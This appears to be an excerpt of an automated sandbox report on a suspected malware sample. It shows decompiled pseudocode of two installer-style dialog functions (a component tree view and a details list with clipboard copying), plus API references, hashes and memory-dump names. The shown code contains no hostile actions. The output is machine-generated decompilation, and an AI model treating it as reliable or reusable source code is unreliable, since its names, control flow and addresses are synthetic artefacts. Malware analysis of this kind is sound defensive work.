                • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00404A09 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 96%
                			E00404A09(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x42f448;
				_t282 = 0;
				_v24 =  *0x42f414 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42f41d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404957(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42f41c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42a854;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x42a868;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42a854 = _t282;
								 *0x42a868 = _t282;
								 *0x42f480 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42f41d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E004049D7();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x42a868;
									_t195 =  *0x42f448;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42f44c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x42ebdc; // 0x84bb3a
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E00404912(0x3ff, 0xfffffffb, E0040492A(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42f44c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x42a868);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42f480 = _t306;
					 *0x42a868 = GlobalAlloc(0x40,  *0x42f44c << 2);
					_t252 = LoadBitmapA( *0x42f400, 0x6e);
					 *0x42a85c =  *0x42a85c | 0xffffffff;
					_t313 = _t252;
					 *0x42a864 = SetWindowLongA(_v8, 0xfffffffc, E00405000);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a854 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a854);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405F87(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00404026(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00404026(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42f44c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x42a868 + _t316 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v32 = 1;
									 *( *0x42a868 + _t316 * 4) = _t276;
									_t284 =  *( *0x42a868 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42f44c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040405B(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040405B(_v12);
								L91:
								return E0040408D(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}





























































                0x00404a18
                0x00404a29
                0x00404a2e
                0x00404a36
                0x00404a3c
                0x00404a44
                0x00404a52
                0x00404a55
                0x00404c75
                0x00404c7c
                0x00404c90
                0x00404c7e
                0x00404c80
                0x00404c83
                0x00404c84
                0x00404c8b
                0x00404c8b
                0x00404c9c
                0x00404caa
                0x00404cad
                0x00404cc3
                0x00404d38
                0x00404d3b
                0x00404d3d
                0x00404d47
                0x00404d55
                0x00404d55
                0x00404d57
                0x00404d61
                0x00404d67
                0x00404d6a
                0x00404d6d
                0x00404d88
                0x00404d6f
                0x00404d79
                0x00404d79
                0x00404d6d
                0x00404d61
                0x00000000
                0x00404d3b
                0x00404cc8
                0x00404cd3
                0x00404cd8
                0x00404cdf
                0x00404ce4
                0x00404ce8
                0x00404cf3
                0x00404cf3
                0x00404cf7
                0x00404cfb
                0x00404cff
                0x00404d12
                0x00404d01
                0x00404d01
                0x00404d08
                0x00404d0e
                0x00404d0a
                0x00404d0a
                0x00404d0a
                0x00404d08
                0x00404d16
                0x00404d18
                0x00404d2b
                0x00404d2e
                0x00404d31
                0x00404d31
                0x00404cfb
                0x00000000
                0x00404ce8
                0x00404cca
                0x00404cd1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404d8b
                0x00404d8b
                0x00404d92
                0x00404e03
                0x00404e0b
                0x00404e13
                0x00404e13
                0x00404e1c
                0x00404e1e
                0x00404e25
                0x00404e28
                0x00404e28
                0x00404e2e
                0x00404e35
                0x00404e38
                0x00404e38
                0x00404e3e
                0x00404e44
                0x00404e4a
                0x00404e4a
                0x00404e57
                0x00404fad
                0x00404fb4
                0x00404fd1
                0x00404fd7
                0x00404fe9
                0x00404fe9
                0x00000000
                0x00404e5d
                0x00404e5f
                0x00404e64
                0x00404e69
                0x00404e6e
                0x00404e70
                0x00404e70
                0x00404e71
                0x00404e72
                0x00404e74
                0x00404e74
                0x00404e7c
                0x00404ebd
                0x00404ebf
                0x00404ecf
                0x00404ed2
                0x00404ed7
                0x00404ede
                0x00404ee1
                0x00404f83
                0x00404f89
                0x00404f8f
                0x00404f97
                0x00404fa8
                0x00404fa8
                0x00000000
                0x00404f97
                0x00404ee7
                0x00404eea
                0x00404ef0
                0x00404ef5
                0x00404ef7
                0x00404ef9
                0x00404eff
                0x00404f06
                0x00404f0b
                0x00404f12
                0x00404f15
                0x00404f15
                0x00404f1c
                0x00404f28
                0x00404f2c
                0x00404f2e
                0x00404f2e
                0x00404f1e
                0x00404f20
                0x00404f20
                0x00404f4e
                0x00404f5a
                0x00404f69
                0x00404f69
                0x00404f6b
                0x00404f6e
                0x00404f77
                0x00000000
                0x00404e7e
                0x00404e89
                0x00404e8c
                0x00404e91
                0x00404e93
                0x00404e97
                0x00404ea7
                0x00404eb1
                0x00404eb3
                0x00404eb6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404e99
                0x00404e99
                0x00404e9f
                0x00404ea1
                0x00404ea1
                0x00404ea2
                0x00404ea3
                0x00000000
                0x00404e99
                0x00404e7c
                0x00404e57
                0x00404d9a
                0x00000000
                0x00404db0
                0x00404dba
                0x00404dbf
                0x00000000
                0x00000000
                0x00404dd1
                0x00404dd6
                0x00404de2
                0x00404de2
                0x00404de4
                0x00404df3
                0x00404df5
                0x00404df9
                0x00404dfc
                0x00000000
                0x00404dfc
                0x00404d9a
                0x00404a5b
                0x00404a60
                0x00404a69
                0x00404a70
                0x00404a7e
                0x00404a89
                0x00404a8f
                0x00404a9d
                0x00404ab1
                0x00404ab6
                0x00404ac3
                0x00404ac8
                0x00404ade
                0x00404aef
                0x00404afc
                0x00404afc
                0x00404aff
                0x00404b05
                0x00404b07
                0x00404b0a
                0x00404b0f
                0x00404b14
                0x00404b16
                0x00404b16
                0x00404b36
                0x00404b36
                0x00404b38
                0x00404b39
                0x00404b3e
                0x00404b41
                0x00404b44
                0x00404b48
                0x00404b4d
                0x00404b52
                0x00404b56
                0x00404b5b
                0x00404b60
                0x00404b62
                0x00404b6a
                0x00404c34
                0x00404c47
                0x00000000
                0x00404b70
                0x00404b73
                0x00404b76
                0x00404b79
                0x00404b79
                0x00404b7f
                0x00404b85
                0x00404b88
                0x00404b8e
                0x00404b8f
                0x00404b94
                0x00404b9d
                0x00404ba4
                0x00404ba7
                0x00404baa
                0x00404bad
                0x00404be9
                0x00404c12
                0x00404beb
                0x00404bf8
                0x00404bf8
                0x00404baf
                0x00404bb2
                0x00404bc1
                0x00404bcb
                0x00404bd3
                0x00404bda
                0x00404be2
                0x00404be2
                0x00404bad
                0x00404c18
                0x00404c19
                0x00404c25
                0x00404c25
                0x00404c32
                0x00404c4d
                0x00404c51
                0x00404c6e
                0x00404c73
                0x00000000
                0x00404c53
                0x00404c58
                0x00404c61
                0x00404feb
                0x00404ffd
                0x00404ffd
                0x00404c51
                0x00000000
                0x00404c32
                0x00404b6a

                APIs
                • GetDlgItem.USER32 ref: 00404A21
                • GetDlgItem.USER32 ref: 00404A2C
                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A76
                • LoadBitmapA.USER32 ref: 00404A89
                • SetWindowLongA.USER32(?,000000FC,00405000), ref: 00404AA2
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AB6
                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AC8
                • SendMessageA.USER32(?,00001109,00000002), ref: 00404ADE
                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEA
                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AFC
                • DeleteObject.GDI32(00000000), ref: 00404AFF
                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2A
                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B36
                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BCB
                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BF6
                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0A
                • GetWindowLongA.USER32 ref: 00404C39
                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C47
                • ShowWindow.USER32(?,00000005), ref: 00404C58
                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D55
                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBA
                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DCF
                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF3
                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E13
                • ImageList_Destroy.COMCTL32(?), ref: 00404E28
                • GlobalFree.KERNEL32 ref: 00404E38
                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB1
                • SendMessageA.USER32(?,00001102,?,?), ref: 00404F5A
                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F69
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F89
                • ShowWindow.USER32(?,00000000), ref: 00404FD7
                • GetDlgItem.USER32 ref: 00404FE2
                • ShowWindow.USER32(00000000), ref: 00404FE9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 1638840714-813528018
                • Opcode ID: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
                • Instruction ID: 5e7fd9033250abe3372a8cc080de2667683fe8f184775387c018329cb0bba4e6
                • Opcode Fuzzy Hash: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
                • Instruction Fuzzy Hash: 9502A1B0A00209AFEB20DF55DD85AAE7BB5FB84315F14413AFA10B62E1C7789D42CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004051CA Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E004051CA(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ebe4; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040515E, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00405F87(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a870;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebcc - _t150; // 0x1
						if(__eflags == 0) {
							ShowWindow( *0x42f408, 8);
							__eflags =  *0x42f4ac - _t150;
							if( *0x42f4ac == _t150) {
								E0040508C( *((intOrPtr*)( *0x42a048 + 0x34)), _t150);
							}
							E00403FFF(1);
							goto L25;
						}
						 *0x429c40 = 2;
						E00403FFF(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E0040408D(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebd0, _t150);
						ShowWindow(_v8, 8);
						E0040405B(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f414;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebd0 = GetDlgItem(_a4, 0x403);
				 *0x42ebc8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ebe4 = _t128;
				_v8 = _t128;
				E0040405B( *0x42ebd0);
				 *0x42ebd4 = E0040492A(4);
				 *0x42ebec = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404026(_a4);
				if(( *0x42f41c & 0x00000003) != 0) {
					ShowWindow( *0x42ebd0, _t150);
					if(( *0x42f41c & 0x00000002) != 0) {
						 *0x42ebd0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040405B( *0x42ebc8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f41c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                0x004051d0
                0x004051d8
                0x004051db
                0x004051e3
                0x004051e6
                0x00405375
                0x0040537b
                0x0040539f
                0x0040539f
                0x004053ab
                0x004053b1
                0x004053d3
                0x004053d3
                0x004053d9
                0x0040542e
                0x0040542e
                0x00405431
                0x00000000
                0x00000000
                0x00405433
                0x00405436
                0x00405439
                0x00000000
                0x00000000
                0x00405443
                0x00405449
                0x0040544b
                0x0040544e
                0x0040554b
                0x00000000
                0x0040554b
                0x0040545d
                0x00405469
                0x00405472
                0x00405479
                0x0040547d
                0x00405480
                0x00405489
                0x0040548f
                0x00405492
                0x00405492
                0x004054a2
                0x004054a8
                0x004054ab
                0x004054b6
                0x004054b6
                0x004054b7
                0x004054ba
                0x004054c1
                0x004054c8
                0x004054d0
                0x004054d0
                0x004054de
                0x004054e4
                0x004054e7
                0x004054e7
                0x004054ee
                0x004054f4
                0x004054fd
                0x00405504
                0x0040550d
                0x0040550f
                0x00405512
                0x00405521
                0x00405523
                0x00405526
                0x00405527
                0x0040552a
                0x0040552b
                0x0040552c
                0x0040552c
                0x00405534
                0x0040553f
                0x00405545
                0x00405545
                0x00000000
                0x004054ab
                0x004053db
                0x004053e1
                0x0040540f
                0x00405411
                0x00405417
                0x00405422
                0x00405422
                0x00405429
                0x00000000
                0x00405429
                0x004053e5
                0x004053ef
                0x00000000
                0x004053b3
                0x004053b3
                0x004053b9
                0x004053f4
                0x00000000
                0x004053fb
                0x004053c2
                0x004053c9
                0x004053ce
                0x00000000
                0x004053ce
                0x004053b1
                0x004051ec
                0x004051f0
                0x004051f8
                0x004051fc
                0x004051ff
                0x00405202
                0x00405205
                0x00405208
                0x00405209
                0x0040520a
                0x00405223
                0x00405226
                0x00405230
                0x0040523f
                0x00405247
                0x0040524f
                0x00405254
                0x00405257
                0x00405263
                0x0040526c
                0x00405275
                0x00405297
                0x0040529d
                0x004052ae
                0x004052b3
                0x004052c1
                0x004052cf
                0x004052cf
                0x004052d4
                0x004052e2
                0x004052e2
                0x004052e7
                0x004052ea
                0x004052ef
                0x004052fb
                0x00405304
                0x00405311
                0x00405320
                0x00405313
                0x00405318
                0x00405318
                0x0040532c
                0x0040532c
                0x00405340
                0x00405349
                0x00405352
                0x00405362
                0x0040536e
                0x0040536e
                0x00000000

                APIs
                • GetDlgItem.USER32 ref: 00405229
                • GetDlgItem.USER32 ref: 00405238
                • GetClientRect.USER32 ref: 00405275
                • GetSystemMetrics.USER32 ref: 0040527C
                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D
                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052AE
                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C1
                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052CF
                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E2
                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405304
                • ShowWindow.USER32(?,00000008), ref: 00405318
                • GetDlgItem.USER32 ref: 00405339
                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405349
                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405362
                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040536E
                • GetDlgItem.USER32 ref: 00405247
                  • Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069
                • GetDlgItem.USER32 ref: 0040538A
                • CreateThread.KERNEL32 ref: 00405398
                • CloseHandle.KERNEL32(00000000), ref: 0040539F
                • ShowWindow.USER32(00000000), ref: 004053C2
                • ShowWindow.USER32(?,00000008), ref: 004053C9
                • ShowWindow.USER32(00000008), ref: 0040540F
                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405443
                • CreatePopupMenu.USER32 ref: 00405454
                • AppendMenuA.USER32 ref: 00405469
                • GetWindowRect.USER32 ref: 00405489
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2
                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054DE
                • OpenClipboard.USER32(00000000), ref: 004054EE
                • EmptyClipboard.USER32 ref: 004054F4
                • GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD
                • GlobalLock.KERNEL32 ref: 00405507
                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B
                • GlobalUnlock.KERNEL32(00000000), ref: 00405534
                • SetClipboardData.USER32 ref: 0040553F
                • CloseClipboard.USER32 ref: 00405545
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
